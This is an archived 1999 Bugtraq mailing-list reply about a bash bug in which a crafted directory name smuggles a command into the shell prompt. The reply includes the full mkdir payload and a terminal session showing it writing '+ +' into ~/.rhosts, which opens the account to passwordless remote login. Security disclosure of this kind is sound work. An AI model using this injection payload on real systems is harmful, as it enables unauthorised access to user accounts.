Bugtraq mailing list archives

Re: Bash Bug

From: guy () SPICE ORG IL (Guy Cohen)
Date: Fri, 23 Apr 1999 00:02:57 +0300


At this (Wed, Apr 21, 1999 at 08:39:48PM -0400) day, Andy Church wrote:
.| >If a user creates a directory with a command like
.| >
.| >mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` "
.| >
.|      Just to clarify, this only happens if PS1 (the bash prompt) contains
.| \w or \W _and_ a prompt is displayed containing the bogus directory name.
.| This means unattended shell scripts are safe.  As a workaround, use `pwd`
.| in place of \w.
.|

Unfortunately this is not true. here is why:
rush:/tmp> bash --version
GNU bash, version 2.03.0(1)-release (i586-pc-linux-gnu)
Copyright 1998 Free Software Foundation, Inc.
rush:/tmp> bash
bash-2.03$ echo $PS1
\s-\v\$
bash-2.03$ cat ~/.rhosts
cat: /export/home/guy/.rhosts: No such file or directory
bash-2.03$ mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` "
bash-2.03$ cd \\\ \ /
bash-2.03$ cat /export/home/guy/.rhosts\
+ +
sh-2.03$


--
Guy Cohen <guy () spice org il>

Current thread:

Re: Bash Bug Andy Church (Apr 21)
- Re: Bash Bug Guy Cohen (Apr 22)
  - WebShop advisory. Elaich Of Hhp (Apr 22)
  - cold fusion scanner hYP0[13/\r (Apr 22)
  - Re: Bash Bug Daniel Jacobowitz (Apr 22)
  - Final Call for Papers - CQRE [Secure] networking Detlef Hühnlein (Apr 23)
  - Ffingerd privacy issues Eilon Gishri (Apr 23)
    - Re: Ffingerd privacy issues Felix von Leitner (Apr 23)
    - Re: Ffingerd privacy issues Eilon Gishri (Apr 23)
    - Re: Ffingerd privacy issues Dagmar d'Surreal (Apr 23)
- Re: Bash Bug Ph. Rueegsegger (Apr 23)
- <Possible follow-ups>
- Re: Bash Bug Henrik Nordstrom (Apr 22)